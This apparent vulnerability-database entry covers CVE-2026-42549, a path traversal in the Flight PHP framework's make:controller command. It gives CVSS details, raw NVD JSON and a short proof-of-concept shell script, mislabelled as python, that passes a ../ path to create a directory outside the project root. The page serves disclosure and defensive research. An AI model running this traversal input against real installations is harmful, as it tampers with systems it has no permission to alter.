Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-42549 CVSS 4.4 MEDIUM

CVE-2026-42549

Published: 2026-05-13 20:16:22
Last Modified: 2026-05-14 20:17:05
Source: [email protected]

Description

Flight is an extensible micro-framework for PHP. Prior to 3.18.1, the make:controller CLI command calls mkdir(..., recursive: true) on a path built from the user-supplied controller name, before Nette's class-name validation runs. The class-file write is correctly rejected by Nette when the name contains /, but the recursive directory creation side effect is already committed β€” including directories located outside the project root through ../ traversal. This vulnerability is fixed in 3.18.1.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Flight PHP Framework < 3.18.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # PoC for CVE-2026-42549: Flight Framework Path Traversal via make:controller # Description: Exploits the directory creation before validation to create directories outside the project root. # Ensure you are in a directory where you have a Flight project initialized cd /path/to/vulnerable/flight/project echo "Attempting to create directory outside project root..." # The payload uses '../' to traverse up the directory tree. # Even though the command will fail validation, the mkdir occurs first. php flight make:controller ../../../tmp/evil_dir_created echo "Check /tmp/ directory. A directory named 'evil_dir_created' should exist." # Note: The exact command syntax depends on how flight binary is set up, usually 'php flight make:controller'

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42549", "sourceIdentifier": "[email protected]", "published": "2026-05-13T20:16:21.927", "lastModified": "2026-05-14T20:17:04.867", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flight is an extensible micro-framework for PHP. Prior to 3.18.1, the make:controller CLI command calls mkdir(..., recursive: true) on a path built from the user-supplied controller name, before Nette's class-name validation runs. The class-file write is correctly rejected by Nette when the name contains /, but the recursive directory creation side effect is already committed β€” including directories located outside the project root through ../ traversal. This vulnerability is fixed in 3.18.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/flightphp/core/security/advisories/GHSA-3xjv-pmf2-gf2q", "source": "[email protected]"}, {"url": "https://github.com/flightphp/core/security/advisories/GHSA-3xjv-pmf2-gf2q", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.